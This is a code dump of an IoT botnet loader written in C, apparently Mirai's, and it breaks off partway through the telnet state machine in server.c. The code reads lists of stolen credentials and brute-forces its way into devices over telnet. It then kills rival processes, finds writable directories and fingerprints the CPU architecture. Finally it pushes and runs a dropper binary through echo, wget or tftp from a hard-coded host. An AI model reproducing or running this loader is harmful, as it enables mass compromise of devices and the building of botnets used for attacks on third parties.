#ifdef DEBUG
printf("matched password prompt at %d, \"%c\", \"%s\"\n", i, conn->rdbuf[i], conn->rdbuf);
#endif
prompt_ending = i;
break;
}
}
if (prompt_ending == -1)
{
int tmp;
if ((tmp = util_memsearch(conn->rdbuf, conn->rdbuf_pos, "assword", 7)) != -1)
prompt_ending = tmp;
}
if (prompt_ending == -1)
return 0;
else
return prompt_ending;
}
int connection_consume_prompt(struct connection *conn)
{
char *pch;
int i, prompt_ending = -1;
for (i = conn->rdbuf_pos; i >= 0; i--)
{
if (conn->rdbuf[i] == ':' || conn->rdbuf[i] == '>' || conn->rdbuf[i] == '$' || conn->rdbuf[i] == '#' || conn->rdbuf[i] == '%')
{
#ifdef DEBUG
printf("matched any prompt at %d, \"%c\", \"%s\"\n", i, conn->rdbuf[i], conn->rdbuf);
#endif
prompt_ending = i;
break;
}
}
if (prompt_ending == -1)
return 0;
else
return prompt_ending;
}
int connection_consume_verify_login(struct connection *conn)
{
int prompt_ending = util_memsearch(conn->rdbuf, conn->rdbuf_pos, TOKEN_RESPONSE, strlen(TOKEN_RESPONSE));
if (prompt_ending == -1)
return 0;
else
return prompt_ending;
}
int connection_consume_psoutput(struct connection *conn)
{
int offset;
char *start = conn->rdbuf;
int i, ii;
offset = util_memsearch(conn->rdbuf, conn->rdbuf_pos, TOKEN_RESPONSE, strlen(TOKEN_RESPONSE));
for (i = 0; i < (offset == -1 ? conn->rdbuf_pos : offset); i++)
{
if (conn->rdbuf[i] == '\r')
conn->rdbuf[i] = 0;
else if (conn->rdbuf[i] == '\n')
{
uint8_t option_on = 0;
BOOL last_character_was_space = FALSE;
char *pid_str = NULL, *proc_name = NULL;
conn->rdbuf[i] = 0;
for (ii = 0; ii < ((char *)&conn->rdbuf[i] - start); ii++)
{
if (start[ii] == ' ' || start[ii] == '\t' || start[ii] == 0)
{
if (option_on > 0 && !last_character_was_space)
option_on++;
start[ii] = 0;
last_character_was_space = TRUE;
}
else
{
if (option_on == 0)
{
pid_str = &start[ii];
option_on++;
}
else if (option_on >= 3 && option_on <= 5 && last_character_was_space)
{
proc_name = &start[ii];
}
last_character_was_space = FALSE;
}
}
if (pid_str != NULL && proc_name != NULL)
{
int pid = atoi(pid_str);
int len_proc_name = strlen(proc_name);
#ifdef DEBUG
printf("pid: %d, proc_name: %s\n", pid, proc_name);
#endif
if (pid != 1 && (strcmp(proc_name, "init") == 0 || strcmp(proc_name, "[init]") == 0)) // Kill the second init
util_sockprintf(conn->fd, "/bin/busybox kill -9 %d\r\n", pid);
else if (pid > 400)
{
int num_count = 0;
int num_alphas = 0;
for (ii = 0; ii < len_proc_name; ii++)
{
if (proc_name[ii] >= '0' && proc_name[ii] <= '9')
num_count++;
else if ((proc_name[ii] >= 'a' && proc_name[ii] <= 'z') || (proc_name[ii] >= 'A' && proc_name[ii] <= 'Z'))
{
num_alphas++;
break;
}
}
if (num_alphas == 0 && num_count > 0)
{
//util_sockprintf(conn->fd, "/bin/busybox cat /proc/%d/environ", pid); // lol
#ifdef DEBUG
printf("Killing suspicious process (pid=%d, name=%s)\n", pid, proc_name);
#endif
util_sockprintf(conn->fd, "/bin/busybox kill -9 %d\r\n", pid);
}
}
}
start = conn->rdbuf + i + 1;
}
}
if (offset == -1)
{
if (conn->rdbuf_pos > 7168)
{
memmove(conn->rdbuf, conn->rdbuf + 6144, conn->rdbuf_pos - 6144);
conn->rdbuf_pos -= 6144;
}
return 0;
}
else
{
for (i = 0; i < conn->rdbuf_pos; i++)
{
if (conn->rdbuf[i] == 0)
conn->rdbuf[i] = ' ';
}
return offset;
}
}
int connection_consume_mounts(struct connection *conn)
{
char linebuf[256];
int linebuf_pos = 0, num_whitespaces = 0;
int i, prompt_ending = util_memsearch(conn->rdbuf, conn->rdbuf_pos, TOKEN_RESPONSE, strlen(TOKEN_RESPONSE));
if (prompt_ending == -1)
return 0;
for (i = 0; i < prompt_ending; i++)
{
if (linebuf_pos == sizeof(linebuf) - 1)
{
// why are we here
break;
}
if (conn->rdbuf[i] == '\n')
{
char *path, *mnt_info;
linebuf[linebuf_pos++] = 0;
strtok(linebuf, " "); // Skip name of partition
if ((path = strtok(NULL, " ")) == NULL)
goto dirs_end_line;
if (strtok(NULL, " ") == NULL) // Skip type of partition
goto dirs_end_line;
if ((mnt_info = strtok(NULL, " ")) == NULL)
goto dirs_end_line;
if (path[strlen(path) - 1] == '/')
path[strlen(path) - 1] = 0;
if (util_memsearch(mnt_info, strlen(mnt_info), "rw", 2) != -1)
{
util_sockprintf(conn->fd, "/bin/busybox echo -e '%s%s' > %s/.nippon; /bin/busybox cat %s/.nippon; /bin/busybox rm %s/.nippon\r\n",
VERIFY_STRING_HEX, path, path, path, path, path);
}
dirs_end_line:
linebuf_pos = 0;
}
else if (conn->rdbuf[i] == ' ' || conn->rdbuf[i] == '\t')
{
if (num_whitespaces++ == 0)
linebuf[linebuf_pos++] = conn->rdbuf[i];
}
else if (conn->rdbuf[i] != '\r')
{
num_whitespaces = 0;
linebuf[linebuf_pos++] = conn->rdbuf[i];
}
}
util_sockprintf(conn->fd, "/bin/busybox echo -e '%s/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon\r\n",
VERIFY_STRING_HEX);
util_sockprintf(conn->fd, TOKEN_QUERY "\r\n");
return prompt_ending;
}
int connection_consume_written_dirs(struct connection *conn)
{
int end_pos, i, offset, total_offset = 0;
BOOL found_writeable = FALSE;
if ((end_pos = util_memsearch(conn->rdbuf, conn->rdbuf_pos, TOKEN_RESPONSE, strlen(TOKEN_RESPONSE))) == -1)
return 0;
while (TRUE)
{
char *pch;
int pch_len;
offset = util_memsearch(conn->rdbuf + total_offset, end_pos - total_offset, VERIFY_STRING_CHECK, strlen(VERIFY_STRING_CHECK));
if (offset == -1)
break;
total_offset += offset;
pch = strtok(conn->rdbuf + total_offset, "\n");
if (pch == NULL)
continue;
pch_len = strlen(pch);
if (pch[pch_len - 1] == '\r')
pch[pch_len - 1] = 0;
util_sockprintf(conn->fd, "rm %s/.t; rm %s/.sh; rm %s/.human\r\n", pch, pch, pch);
if (!found_writeable)
{
if (pch_len < 31)
{
strcpy(conn->info.writedir, pch);
found_writeable = TRUE;
}
else
connection_close(conn);
}
}
return end_pos;
}
int connection_consume_copy_op(struct connection *conn)
{
int offset = util_memsearch(conn->rdbuf, conn->rdbuf_pos, TOKEN_RESPONSE, strlen(TOKEN_RESPONSE));
if (offset == -1)
return 0;
return offset;
}
int connection_consume_arch(struct connection *conn)
{
if (!conn->info.has_arch)
{
struct elf_hdr *ehdr;
int elf_start_pos;
if ((elf_start_pos = util_memsearch(conn->rdbuf, conn->rdbuf_pos, "ELF", 3)) == -1)
return 0;
elf_start_pos -= 4; // Go back ELF
ehdr = (struct elf_hdr *)(conn->rdbuf + elf_start_pos);
conn->info.has_arch = TRUE;
switch (ehdr->e_ident[EI_DATA])
{
case EE_NONE:
return 0;
case EE_BIG:
#ifdef LOADER_LITTLE_ENDIAN
ehdr->e_machine = htons(ehdr->e_machine);
#endif
break;
case EE_LITTLE:
#ifdef LOADER_BIG_ENDIAN
ehdr->e_machine = htons(ehdr->e_machine);
#endif
break;
}
/* arm mpsl spc m68k ppc x86 mips sh4 */
if (ehdr->e_machine == EM_ARM || ehdr->e_machine == EM_AARCH64)
strcpy(conn->info.arch, "arm");
else if (ehdr->e_machine == EM_MIPS || ehdr->e_machine == EM_MIPS_RS3_LE)
{
if (ehdr->e_ident[EI_DATA] == EE_LITTLE)
strcpy(conn->info.arch, "mpsl");
else
strcpy(conn->info.arch, "mips");
}
else if (ehdr->e_machine == EM_386 || ehdr->e_machine == EM_486 || ehdr->e_machine == EM_860 || ehdr->e_machine == EM_X86_64)
strcpy(conn->info.arch, "x86");
else if (ehdr->e_machine == EM_SPARC || ehdr->e_machine == EM_SPARC32PLUS || ehdr->e_machine == EM_SPARCV9)
strcpy(conn->info.arch, "spc");
else if (ehdr->e_machine == EM_68K || ehdr->e_machine == EM_88K)
strcpy(conn->info.arch, "m68k");
else if (ehdr->e_machine == EM_PPC || ehdr->e_machine == EM_PPC64)
strcpy(conn->info.arch, "ppc");
else if (ehdr->e_machine == EM_SH)
strcpy(conn->info.arch, "sh4");
else
{
conn->info.arch[0] = 0;
connection_close(conn);
}
}
else
{
int offset;
if ((offset = util_memsearch(conn->rdbuf, conn->rdbuf_pos, TOKEN_RESPONSE, strlen(TOKEN_RESPONSE))) != -1)
return offset;
if (conn->rdbuf_pos > 7168)
{
// Hack drain buffer
memmove(conn->rdbuf, conn->rdbuf + 6144, conn->rdbuf_pos - 6144);
conn->rdbuf_pos -= 6144;
}
}
return 0;
}
int connection_consume_arm_subtype(struct connection *conn)
{
int offset = util_memsearch(conn->rdbuf, conn->rdbuf_pos, TOKEN_RESPONSE, strlen(TOKEN_RESPONSE));
if (offset == -1)
return 0;
if (util_memsearch(conn->rdbuf, offset, "ARMv7", 5) != -1 || util_memsearch(conn->rdbuf, offset, "ARMv6", 5) != -1)
{
#ifdef DEBUG
printf("[FD%d] Arch has ARMv7!\n", conn->fd);
#endif
strcpy(conn->info.arch, "arm7");
}
return offset;
}
int connection_consume_upload_methods(struct connection *conn)
{
int offset = util_memsearch(conn->rdbuf, conn->rdbuf_pos, TOKEN_RESPONSE, strlen(TOKEN_RESPONSE));
if (offset == -1)
return 0;
if (util_memsearch(conn->rdbuf, offset, "wget: applet not found", 22) == -1)
conn->info.upload_method = UPLOAD_WGET;
else if (util_memsearch(conn->rdbuf, offset, "tftp: applet not found", 22) == -1)
conn->info.upload_method = UPLOAD_TFTP;
else
conn->info.upload_method = UPLOAD_ECHO;
return offset;
}
int connection_upload_echo(struct connection *conn)
{
int offset = util_memsearch(conn->rdbuf, conn->rdbuf_pos, TOKEN_RESPONSE, strlen(TOKEN_RESPONSE));
if (offset == -1)
return 0;
if (conn->bin == NULL)
{
connection_close(conn);
return 0;
}
if (conn->echo_load_pos == conn->bin->hex_payloads_len)
return offset;
// echo -ne 'hex' [>]> path/FN_DROPPER
util_sockprintf(conn->fd, "echo -ne '%s' %s " FN_DROPPER "; " TOKEN_QUERY "\r\n",
conn->bin->hex_payloads[conn->echo_load_pos], (conn->echo_load_pos == 0) ? ">" : ">>");
conn->echo_load_pos++;
// Hack drain
memmove(conn->rdbuf, conn->rdbuf + offset, conn->rdbuf_pos - offset);
conn->rdbuf_pos -= offset;
return 0;
}
int connection_upload_wget(struct connection *conn)
{
int offset = util_memsearch(conn->rdbuf, conn->rdbuf_pos, TOKEN_RESPONSE, strlen(TOKEN_RESPONSE));
if (offset == -1)
return 0;
return offset;
}
int connection_upload_tftp(struct connection *conn)
{
int offset = util_memsearch(conn->rdbuf, conn->rdbuf_pos, TOKEN_RESPONSE, strlen(TOKEN_RESPONSE));
if (offset == -1)
return 0;
if (util_memsearch(conn->rdbuf, offset, "Permission denied", 17) != -1)
return offset * -1;
if (util_memsearch(conn->rdbuf, offset, "timeout", 7) != -1)
return offset * -1;
if (util_memsearch(conn->rdbuf, offset, "illegal option", 14) != -1)
return offset * -1;
return offset;
}
int connection_verify_payload(struct connection *conn)
{
int offset = util_memsearch(conn->rdbuf, conn->rdbuf_pos, EXEC_RESPONSE, strlen(EXEC_RESPONSE));
if (offset == -1)
return 0;
if (util_memsearch(conn->rdbuf, offset, "listening tun0", 14) == -1)
return offset;
else
return 255 + offset;
}
int connection_consume_cleanup(struct connection *conn)
{
int offset = util_memsearch(conn->rdbuf, conn->rdbuf_pos, TOKEN_RESPONSE, strlen(TOKEN_RESPONSE));
if (offset == -1)
return 0;
return offset;
}
static BOOL can_consume(struct connection *conn, uint8_t *ptr, int amount)
{
uint8_t *end = conn->rdbuf + conn->rdbuf_pos;
return ptr + amount < end;
}
================================================
FILE: loader/src/headers/binary.h
================================================
#pragma once
#include "includes.h"
#define BINARY_BYTES_PER_ECHOLINE 128
struct binary {
char arch[6];
int hex_payloads_len;
char **hex_payloads;
};
BOOL binary_init(void);
struct binary *binary_get_by_arch(char *arch);
static BOOL load(struct binary *bin, char *fname);
================================================
FILE: loader/src/headers/connection.h
================================================
#pragma once
#include <time.h>
#include <pthread.h>
#include "includes.h"
#include "telnet_info.h"
struct connection {
pthread_mutex_t lock;
struct server *srv;
struct binary *bin;
struct telnet_info info;
int fd, echo_load_pos;
time_t last_recv;
enum {
TELNET_CLOSED, // 0
TELNET_CONNECTING, // 1
TELNET_READ_IACS, // 2
TELNET_USER_PROMPT, // 3
TELNET_PASS_PROMPT, // 4
TELNET_WAITPASS_PROMPT, // 5
TELNET_CHECK_LOGIN, // 6
TELNET_VERIFY_LOGIN, // 7
TELNET_PARSE_PS, // 8
TELNET_PARSE_MOUNTS, // 9
TELNET_READ_WRITEABLE, // 10
TELNET_COPY_ECHO, // 11
TELNET_DETECT_ARCH, // 12
TELNET_ARM_SUBTYPE, // 13
TELNET_UPLOAD_METHODS, // 14
TELNET_UPLOAD_ECHO, // 15
TELNET_UPLOAD_WGET, // 16
TELNET_UPLOAD_TFTP, // 17
TELNET_RUN_BINARY, // 18
TELNET_CLEANUP // 19
} state_telnet;
struct {
char data[512];
int deadline;
} output_buffer;
uint16_t rdbuf_pos, timeout;
BOOL open, success, retry_bin, ctrlc_retry;
uint8_t rdbuf[8192];
};
void connection_open(struct connection *conn);
void connection_close(struct connection *conn);
int connection_consume_iacs(struct connection *conn);
int connection_consume_login_prompt(struct connection *conn);
int connection_consume_password_prompt(struct connection *conn);
int connection_consume_prompt(struct connection *conn);
int connection_consume_verify_login(struct connection *conn);
int connection_consume_psoutput(struct connection *conn);
int connection_consume_mounts(struct connection *conn);
int connection_consume_written_dirs(struct connection *conn);
int connection_consume_copy_op(struct connection *conn);
int connection_consume_arch(struct connection *conn);
int connection_consume_arm_subtype(struct connection *conn);
int connection_consume_upload_methods(struct connection *conn);
int connection_upload_echo(struct connection *conn);
int connection_upload_wget(struct connection *conn);
int connection_upload_tftp(struct connection *conn);
int connection_verify_payload(struct connection *conn);
int connection_consume_cleanup(struct connection *conn);
static BOOL can_consume(struct connection *conn, uint8_t *ptr, int amount);
================================================
FILE: loader/src/headers/includes.h
================================================
#pragma once
#include <stdint.h>
#define STDIN 0
#define STDOUT 1
#define STDERR 2
#define FALSE 0
#define TRUE 1
typedef char BOOL;
typedef uint32_t ipv4_t;
typedef uint16_t port_t;
#define LOADER_LITTLE_ENDIAN
#define ATOMIC_ADD(ptr,i) __sync_fetch_and_add((ptr),i)
#define ATOMIC_SUB(ptr,i) __sync_fetch_and_sub((ptr),i)
#define ATOMIC_INC(ptr) ATOMIC_ADD((ptr),1)
#define ATOMIC_DEC(ptr) ATOMIC_SUB((ptr),1)
#define ATOMIC_GET(ptr) ATOMIC_ADD((ptr),0)
#define VERIFY_STRING_HEX "\\x6b\\x61\\x6d\\x69"
#define VERIFY_STRING_CHECK "kami"
#define TOKEN_QUERY "/bin/busybox ECCHI"
#define TOKEN_RESPONSE "ECCHI: applet not found"
#define EXEC_QUERY "/bin/busybox IHCCE"
#define EXEC_RESPONSE "IHCCE: applet not found"
#define FN_DROPPER "upnp"
#define FN_BINARY "dvrHelper"
extern char *id_tag;
================================================
FILE: loader/src/headers/server.h
================================================
#pragma once
#include <sys/epoll.h>
#include "includes.h"
#include "telnet_info.h"
#include "connection.h"
struct server {
uint32_t max_open;
volatile uint32_t curr_open;
volatile uint32_t total_input, total_logins, total_echoes, total_wgets, total_tftps, total_successes, total_failures;
char *wget_host_ip, *tftp_host_ip;
struct server_worker *workers;
struct connection **estab_conns;
ipv4_t *bind_addrs;
pthread_t to_thrd;
port_t wget_host_port;
uint8_t workers_len, bind_addrs_len;
int curr_worker_child;
};
struct server_worker {
struct server *srv;
int efd; // We create a separate epoll context per thread so thread safety isn't our problem
pthread_t thread;
uint8_t thread_id;
};
struct server *server_create(uint8_t threads, uint8_t addr_len, ipv4_t *addrs, uint32_t max_open, char *wghip, port_t wghp, char *thip);
void server_destroy(struct server *srv);
void server_queue_telnet(struct server *srv, struct telnet_info *info);
void server_telnet_probe(struct server *srv, struct telnet_info *info);
static void bind_core(int core);
static void *worker(void *arg);
static void handle_output_buffers(struct server_worker *);
static void handle_event(struct server_worker *wrker, struct epoll_event *ev);
static void *timeout_thread(void *);
================================================
FILE: loader/src/headers/telnet_info.h
================================================
#pragma once
#include "includes.h"
struct telnet_info {
char user[32], pass[32], arch[6], writedir[32];
ipv4_t addr;
port_t port;
enum {
UPLOAD_ECHO,
UPLOAD_WGET,
UPLOAD_TFTP
} upload_method;
BOOL has_auth, has_arch;
};
struct telnet_info *telnet_info_new(char *user, char *pass, char *arch, ipv4_t addr, port_t port, struct telnet_info *info);
struct telnet_info *telnet_info_parse(char *str, struct telnet_info *out);
================================================
FILE: loader/src/headers/util.h
================================================
#pragma once
#include "server.h"
#include "includes.h"
#define BUFFER_SIZE 4096
#define EI_NIDENT 16 // Side of e_ident in elf header
#define EI_DATA 5 // Offset endianness in e_ident
#define EE_NONE 0 // No endianness ????
#define EE_LITTLE 1 // Little endian
#define EE_BIG 2 // Big endian
#define ET_NOFILE 0 // None
#define ET_REL 1 // Relocatable file
#define ET_EXEC 2 // Executable file
#define ET_DYN 3 // Shared object file
#define ET_CORE 4 // Core file
/* These constants define the various ELF target machines */
#define EM_NONE 0
#define EM_M32 1
#define EM_SPARC 2
#define EM_386 3
#define EM_68K 4 // m68k
#define EM_88K 5 // m68k
#define EM_486 6 // x86
#define EM_860 7 // Unknown
#define EM_MIPS 8 /* MIPS R3000 (officially, big-endian only) */
/* Next two are historical and binaries and
modules of these types will be rejected by
Linux. */
#define EM_MIPS_RS3_LE 10 /* MIPS R3000 little-endian */
#define EM_MIPS_RS4_BE 10 /* MIPS R4000 big-endian */
#define EM_PARISC 15 /* HPPA */
#define EM_SPARC32PLUS 18 /* Sun's "v8plus" */
#define EM_PPC 20 /* PowerPC */
#define EM_PPC64 21 /* PowerPC64 */
#define EM_SPU 23 /* Cell BE SPU */
#define EM_ARM 40 /* ARM 32 bit */
#define EM_SH 42 /* SuperH */
#define EM_SPARCV9 43 /* SPARC v9 64-bit */
#define EM_H8_300 46 /* Renesas H8/300 */
#define EM_IA_64 50 /* HP/Intel IA-64 */
#define EM_X86_64 62 /* AMD x86-64 */
#define EM_S390 22 /* IBM S/390 */
#define EM_CRIS 76 /* Axis Communications 32-bit embedded processor */
#define EM_M32R 88 /* Renesas M32R */
#define EM_MN10300 89 /* Panasonic/MEI MN10300, AM33 */
#define EM_OPENRISC 92 /* OpenRISC 32-bit embedded processor */
#define EM_BLACKFIN 106 /* ADI Blackfin Processor */
#define EM_ALTERA_NIOS2 113 /* Altera Nios II soft-core processor */
#define EM_TI_C6000 140 /* TI C6X DSPs */
#define EM_AARCH64 183 /* ARM 64 bit */
#define EM_TILEPRO 188 /* Tilera TILEPro */
#define EM_MICROBLAZE 189 /* Xilinx MicroBlaze */
#define EM_TILEGX 191 /* Tilera TILE-Gx */
#define EM_FRV 0x5441 /* Fujitsu FR-V */
#define EM_AVR32 0x18ad /* Atmel AVR32 */
struct elf_hdr {
uint8_t e_ident[EI_NIDENT];
uint16_t e_type, e_machine;
uint32_t e_version;
} __attribute__((packed));
int util_socket_and_bind(struct server *srv);
int util_memsearch(char *buf, int buf_len, char *mem, int mem_len);
BOOL util_sockprintf(int fd, const char *fmt, ...);
char *util_trim(char *str);
================================================
FILE: loader/src/main.c
================================================
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/socket.h>
#include <errno.h>
#include "headers/includes.h"
#include "headers/server.h"
#include "headers/telnet_info.h"
#include "headers/binary.h"
#include "headers/util.h"
static void *stats_thread(void *);
static struct server *srv;
char *id_tag = "telnet";
int main(int argc, char **args)
{
pthread_t stats_thrd;
uint8_t addrs_len;
ipv4_t *addrs;
uint32_t total = 0;
struct telnet_info info;
#ifdef DEBUG
addrs_len = 1;
addrs = calloc(4, sizeof (ipv4_t));
addrs[0] = inet_addr("0.0.0.0");
#else
addrs_len = 2;
addrs = calloc(addrs_len, sizeof (ipv4_t));
addrs[0] = inet_addr("192.168.0.1"); // Address to bind to
addrs[1] = inet_addr("192.168.1.1"); // Address to bind to
#endif
if (argc == 2)
{
id_tag = args[1];
}
if (!binary_init())
{
printf("Failed to load bins/dlr.* as dropper\n");
return 1;
}
/* wget address tftp address */
if ((srv = server_create(sysconf(_SC_NPROCESSORS_ONLN), addrs_len, addrs, 1024 * 64, "100.200.100.100", 80, "100.200.100.100")) == NULL)
{
printf("Failed to initialize server. Aborting\n");
return 1;
}
pthread_create(&stats_thrd, NULL, stats_thread, NULL);
// Read from stdin
while (TRUE)
{
char strbuf[1024];
if (fgets(strbuf, sizeof (strbuf), stdin) == NULL)
break;
util_trim(strbuf);
if (strlen(strbuf) == 0)
{
usleep(10000);
continue;
}
memset(&info, 0, sizeof(struct telnet_info));
if (telnet_info_parse(strbuf, &info) == NULL)
printf("Failed to parse telnet info: \"%s\" Format -> ip:port user:pass arch\n", strbuf);
else
{
if (srv == NULL)
printf("srv == NULL 2\n");
server_queue_telnet(srv, &info);
if (total++ % 1000 == 0)
sleep(1);
}
ATOMIC_INC(&srv->total_input);
}
printf("Hit end of input.\n");
while(ATOMIC_GET(&srv->curr_open) > 0)
sleep(1);
return 0;
}
static void *stats_thread(void *arg)
{
uint32_t seconds = 0;
while (TRUE)
{
#ifndef DEBUG
printf("%ds\tProcessed: %d\tConns: %d\tLogins: %d\tRan: %d\tEchoes:%d Wgets: %d, TFTPs: %d\n",
seconds++, ATOMIC_GET(&srv->total_input), ATOMIC_GET(&srv->curr_open), ATOMIC_GET(&srv->total_logins), ATOMIC_GET(&srv->total_successes),
ATOMIC_GET(&srv->total_echoes), ATOMIC_GET(&srv->total_wgets), ATOMIC_GET(&srv->total_tftps));
#endif
fflush(stdout);
sleep(1);
}
}
================================================
FILE: loader/src/server.c
================================================
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <sys/epoll.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <string.h>
#include <sched.h>
#include <errno.h>
#include "headers/includes.h"
#include "headers/server.h"
#include "headers/telnet_info.h"
#include "headers/connection.h"
#include "headers/binary.h"
#include "headers/util.h"
struct server *server_create(uint8_t threads, uint8_t addr_len, ipv4_t *addrs, uint32_t max_open, char *wghip, port_t wghp, char *thip)
{
struct server *srv = calloc(1, sizeof (struct server));
struct server_worker *workers = calloc(threads, sizeof (struct server_worker));
int i;
// Fill out the structure
srv->bind_addrs_len = addr_len;
srv->bind_addrs = addrs;
srv->max_open = max_open;
srv->wget_host_ip = wghip;
srv->wget_host_port = wghp;
srv->tftp_host_ip = thip;
srv->estab_conns = calloc(max_open * 2, sizeof (struct connection *));
srv->workers = calloc(threads, sizeof (struct server_worker));
srv->workers_len = threads;
if (srv->estab_conns == NULL)
{
printf("Failed to allocate establisted_connections array\n");
exit(0);
}
// Allocate locks internally
for (i = 0; i < max_open * 2; i++)
{
srv->estab_conns[i] = calloc(1, sizeof (struct connection));
if (srv->estab_conns[i] == NULL)
{
printf("Failed to allocate connection %d\n", i);
exit(-1);
}
pthread_mutex_init(&(srv->estab_conns[i]->lock), NULL);
}
// Create worker threads
for (i = 0; i < threads; i++)
{
struct server_worker *wrker = &srv->workers[i];
wrker->srv = srv;
wrker->thread_id = i;
if ((wrker->efd = epoll_create1(0)) == -1)
{
printf("Failed to initialize epoll context. Error code %d\n", errno);
free(srv->workers);
free(srv);
return NULL;
}
pthread_create(&wrker->thread, NULL, worker, wrker);
}
pthread_create(&srv->to_thrd, NULL, timeout_thread, srv);
return srv;
}
void server_destroy(struct server *srv)
{
if (srv == NULL)
return;
if (srv->bind_addrs != NULL)
free(srv->bind_addrs);
if (srv->workers != NULL)
free(srv->workers);
free(srv);
}
void server_queue_telnet(struct server *srv, struct telnet_info *info)
{
while (ATOMIC_GET(&srv->curr_open) >= srv->max_open)
{
sleep(1);
}
ATOMIC_INC(&srv->curr_open);
if (srv == NULL)
printf("srv == NULL 3\n");
server_telnet_probe(srv, info);
}
void server_telnet_probe(struct server *srv, struct telnet_info *info)
{
int fd = util_socket_and_bind(srv);
struct sockaddr_in addr;
struct connection *conn;
struct epoll_event event;
int ret;
struct server_worker *wrker = &srv->workers[ATOMIC_INC(&srv->curr_worker_child) % srv->workers_len];
if (fd == -1)
{
if (time(NULL) % 10 == 0)
{
printf("Failed to open and bind socket\n");
}
ATOMIC_DEC(&srv->curr_open);
return;
}
while (fd >= (srv->max_open * 2))
{
printf("fd too big\n");
conn->fd = fd;
#ifdef DEBUG
printf("Can't utilize socket because client buf is not large enough\n");
#endif
connection_close(conn);
return;
}
if (srv == NULL)
printf("srv == NULL 4\n");
conn = srv->estab_conns[fd];
memcpy(&conn->info, info, sizeof (struct telnet_info));
conn->srv = srv;
conn->fd = fd;
connection_open(conn);
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = info->addr;
addr.sin_port = info->port;
ret = connect(fd, (struct sockaddr *)&addr, sizeof (struct sockaddr_in));
if (ret == -1 && errno != EINPROGRESS)
{
printf("got connect error\n");
}
event.data.fd = fd;
event.events = EPOLLOUT;
epoll_ctl(wrker->efd, EPOLL_CTL_ADD, fd, &event);
}
static void bind_core(int core)
{
pthread_t tid = pthread_self();
cpu_set_t cpuset;
CPU_ZERO(&cpuset);
CPU_SET(core, &cpuset);
if (pthread_setaffinity_np(tid, sizeof (cpu_set_t), &cpuset) != 0)
printf("Failed to bind to core %d\n", core);
}
static void *worker(void *arg)
{
struct server_worker *wrker = (struct server_worker *)arg;
struct epoll_event events[128];
bind_core(wrker->thread_id);
while (TRUE)
{
int i, n = epoll_wait(wrker->efd, events, 127, -1);
if (n == -1)
perror("epoll_wait");
for (i = 0; i < n; i++)
handle_event(wrker, &events[i]);
}
}
static void handle_event(struct server_worker *wrker, struct epoll_event *ev)
{
struct connection *conn = wrker->srv->estab_conns[ev->data.fd];
if (conn->fd == -1)
{
conn->fd = ev->data.fd;
connection_close(conn);
return;
}
if (conn->fd != ev->data.fd)
{
printf("yo socket mismatch\n");
}
// Check if there was an error
if (ev->events & EPOLLERR || ev->events & EPOLLHUP || ev->events & EPOLLRDHUP)
{
#ifdef DEBUG
if (conn->open)
printf("[FD%d] Encountered an error and must shut down\n", ev->data.fd);
#endif
connection_close(conn);
return;
}
// Are we ready to write?
if (conn->state_telnet == TELNET_CONNECTING && ev->events & EPOLLOUT)
{
struct epoll_event event;
int so_error = 0;
socklen_t len = sizeof(so_error);
getsockopt(conn->fd, SOL_SOCKET, SO_ERROR, &so_error, &len);
if (so_error)
{
#ifdef DEBUG
printf("[FD%d] Connection refused\n", ev->data.fd);
#endif
connection_close(conn);
return;
}
#ifdef DEBUG
printf("[FD%d] Established connection\n", ev->data.fd);
#endif
event.data.fd = conn->fd;
event.events = EPOLLIN | EPOLLET;
epoll_ctl(wrker->efd, EPOLL_CTL_MOD, conn->fd, &event);
conn->state_telnet = TELNET_READ_IACS;
conn->timeout = 30;
}
if (!conn->open)
{
printf("socket not open! conn->fd: %d, fd: %d, events: %08x, state: %08x\n", conn->fd, ev->data.fd, ev->events, conn->state_telnet);
}
// Is there data to read?
if (ev->events & EPOLLIN && conn->open)
{
int ret;
conn->last_recv = time(NULL);
while (TRUE)
{
ret = recv(conn->fd, conn->rdbuf + conn->rdbuf_pos, sizeof (conn->rdbuf) - conn->rdbuf_pos, MSG_NOSIGNAL);
if (ret <= 0)
{
if (errno != EAGAIN && errno != EWOULDBLOCK)
{
#ifdef DEBUG
if (conn->open)
printf("[FD%d] Encountered error %d. Closing\n", ev->data.fd, errno);
#endif
connection_close(conn);
}
break;
}
#ifdef DEBUG
printf("TELIN: %.*s\n", ret, conn->rdbuf + conn->rdbuf_pos);
#endif
conn->rdbuf_pos += ret;
conn->last_recv = time(NULL);
if (conn->rdbuf_pos > 8196)
{
printf("oversized buffer pointer!\n");
abort();
}
while (TRUE)
{
int consumed;
switch (conn->state_telnet)
{
case TELNET_READ_IACS:
consumed = connection_consume_iacs(conn);
if (consumed)
conn->state_telnet = TELNET_USER_PROMPT;
break;
case TELNET_USER_PROMPT:
consumed = connection_consume_login_prompt(conn);
if (consumed)
{
util_sockprintf(conn->fd, "%s", conn->info.user);
strcpy(conn->output_buffer.data, "\r\n");
conn->output_buffer.deadline = time(NULL) + 1;
conn->state_telnet = TELNET_PASS_PROMPT;
}
break;
case TELNET_PASS_PROMPT:
consumed = connection_consume_password_prompt(conn);
if (consumed)
{
util_sockprintf(conn->fd, "%s", conn->info.pass);
strcpy(conn->output_buffer.data, "\r\n");
conn->output_buffer.deadline = time(NULL) + 1;
conn->state_telnet = TELNET_WAITPASS_PROMPT; // At the very least it will print SOMETHING
}
break;
case TELNET_WAITPASS_PROMPT:
if ((consumed = connection_consume_prompt(conn)) > 0)
{
util_sockprintf(conn->fd, "enable\r\n");
util_sockprintf(conn->fd, "shell\r\n");
util_sockprintf(conn->fd, "sh\r\n");
conn->state_telnet = TELNET_CHECK_LOGIN;
}
break;
case TELNET_CHECK_LOGIN:
if ((consumed = connection_consume_prompt(conn)) > 0)
{
util_sockprintf(conn->fd, TOKEN_QUERY "\r\n");
conn->state_telnet = TELNET_VERIFY_LOGIN;
}
break;
case TELNET_VERIFY_LOGIN:
consumed = connection_consume_verify_login(conn);
if (consumed)
{
ATOMIC_INC(&wrker->srv->total_logins);
#ifdef DEBUG
printf("[FD%d] Succesfully logged in\n", ev->data.fd);
#endif
util_sockprintf(conn->fd, "/bin/busybox ps; " TOKEN_QUERY "\r\n");
conn->state_telnet = TELNET_PARSE_PS;
}
break;
case TELNET_PARSE_PS:
